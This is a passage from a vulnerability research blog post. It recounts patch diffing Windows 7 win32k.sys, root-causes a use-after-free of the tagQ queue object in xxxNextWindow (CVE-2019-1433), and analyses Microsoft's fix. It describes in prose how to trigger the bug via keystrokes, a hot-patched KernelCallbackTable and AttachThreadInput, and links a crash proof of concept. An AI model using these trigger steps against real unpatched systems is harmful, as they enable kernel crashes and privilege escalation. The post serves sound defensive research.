win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Foreshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. \n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n&lt;ALT (Extended)&gt; \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&amp;gspwndActivate, v48);\n\nif ( !*(_QWORD *)&amp;gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue-&gt;spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue-&gt;ptiKeyboard-&gt;rpdesk-&gt;pDeskInfo-&gt;spwnd-&gt;spwndChild) != 0i64 ) {\n\n \n\n\n[...] \n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 &lt;\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\nxxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. \n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\n++queue-&gt;cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread-&gt;ptlW32;\n\ncurrWin32Thread-&gt;ptlW32 = (_TL *)&amp;threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2-&gt;ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got 